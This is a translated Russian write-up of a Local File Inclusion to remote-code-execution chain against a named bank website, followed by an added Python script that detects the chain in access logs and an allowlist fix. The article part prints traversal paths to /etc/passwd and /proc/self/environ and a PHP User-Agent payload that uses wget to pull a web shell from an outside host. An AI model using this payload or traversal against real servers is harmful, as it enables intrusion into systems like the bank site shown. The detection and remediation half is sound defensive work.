Translation of Russian technical articles

Breaking the Bank Website or From LFI to RCE

A friend of mine was recently hired by a bank, and he asked me to check the kubunibank.ru website for security vulnerabilities. I chose Acunetix Web Scanner as the audit tool, since this scanner is the best option for an initial inspection. The website is pretty small, and a 5-minute check turned up 3 LFI (Local File Inclusion) bugs, so I immediately wanted to get a shell there.

In this case all the PHP code in shell.php would be executed. But using a URL as the include parameter is forbidden, because allow_url_include=0 is set in php.ini.

So we can’t go straight to code execution.
All we can do is poke around local files. We can list the users in /etc/passwd or find out which Linux distribution the server runs. Inserting /../../../../../../../../../etc/gentoo-release shows that the server runs Gentoo Linux. However, reading files doesn’t give us the ability to execute anything. Time to move on. Let’s check /proc/self/environ.

This is where it gets interesting, since we can influence the log file content. We can use a Firefox plugin to execute PHP code by setting the following value as the User-Agent in any request to the website:

<?php system(`wget 0x90.ru/shell.txt -O shell.php`)?>

Note that we use backtick (`) quotes, since the server rejects double (") and single (') quotes. The web server will write our request into the log file, and we are now one step away from code execution. We have to use the following link to execute the code.
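From the defender's side, the whole chain above (traversal in an include parameter, a read of /proc/self/environ, PHP tags smuggled in through the User-Agent) is visible in the web server's access log. The script below is an added example, not code from the original article: it parses combined-format access log lines, tags each request with the indicators it carries, and correlates per source IP so that a host which both included /proc/self/environ and sent PHP code in a header is reported as having completed the chain. The sample log lines, the `page` parameter name and the Apache/nginx "combined" log format are constructed assumptions; the sample User-Agent carries a harmless PHP marker rather than the article's wget payload.

```python
"""Detect the LFI -> /proc/self/environ -> User-Agent injection chain in
web-server access logs.

Added example, not code from the original article.  The log lines, the
``page`` parameter name and the Apache/nginx "combined" log format are
constructed assumptions."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# combined format: ip ident user [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Classic LFI probe targets that a web application never legitimately includes
SENSITIVE_TARGETS = ("/etc/passwd", "/etc/gentoo-release", "/proc/self/environ",
                     "/proc/self/fd/", "/var/log/")
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)

# Constructed sample log (not real traffic): a normal request, the two probes
# from the article, a percent-encoded probe, and one malformed line.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=/../../../../../../../../../etc/gentoo-release HTTP/1.1" 200 40 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?page=/../../../../../../../../../proc/self/environ HTTP/1.1" 200 2048 "-" "<?php echo 'injected' ?>"
203.0.113.9 - - [10/Oct/2023:13:58:40 +0000] "GET /index.php?page=%2fetc%2fpasswd HTTP/1.1" 200 1200 "-" "curl/7.88"
this line is not in combined format
"""


def parse_line(line):
    """Parse one combined-format line; return a dict of fields or None."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def param_values(path):
    """Decoded query-string values of a request path.  parse_qs already
    percent-decodes once; the second unquote catches double-encoded probes."""
    query = urlsplit(path).query
    return [unquote(v) for vs in parse_qs(query, keep_blank_values=True).values() for v in vs]


def classify(entry):
    """Tag one parsed entry with the LFI/RCE indicators it carries."""
    findings = []
    values = param_values(entry["path"])
    if any(TRAVERSAL_RE.search(v) for v in values):
        findings.append("traversal")
    if any(t in v.lower() for v in values for t in SENSITIVE_TARGETS):
        findings.append("sensitive-file")
    if any("/proc/self/environ" in v.lower() for v in values):
        findings.append("environ-include")
    # PHP tags in request headers end up in environ and in the access log itself
    if PHP_TAG_RE.search(entry["ua"]) or PHP_TAG_RE.search(entry["referer"]):
        findings.append("php-in-header")
    return findings


def scan(lines):
    """Return one alert dict per log line that carries at least one indicator."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # not combined format; a real tool would count these
        findings = classify(entry)
        if findings:
            alerts.append({"ip": entry["ip"], "path": entry["path"], "findings": findings})
    return alerts


def chained_sources(alerts):
    """IPs that both included /proc/self/environ and sent PHP code in a header:
    the full LFI-to-RCE chain from the article, possibly across several requests."""
    seen = {}
    for a in alerts:
        seen.setdefault(a["ip"], set()).update(a["findings"])
    return {ip for ip, tags in seen.items()
            if {"environ-include", "php-in-header"} <= tags}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for a in found:
        print(a["ip"], a["path"], ",".join(a["findings"]))
    print("chain completed by:", sorted(chained_sources(found)))
```

Detection like this is a compensating control; the root cause is passing a request parameter to include(). The fix is to map the parameter onto an allowlist of known template names (or reject anything containing a slash or `..`) before it reaches include(), so that neither /etc/gentoo-release nor /proc/self/environ is ever a reachable target.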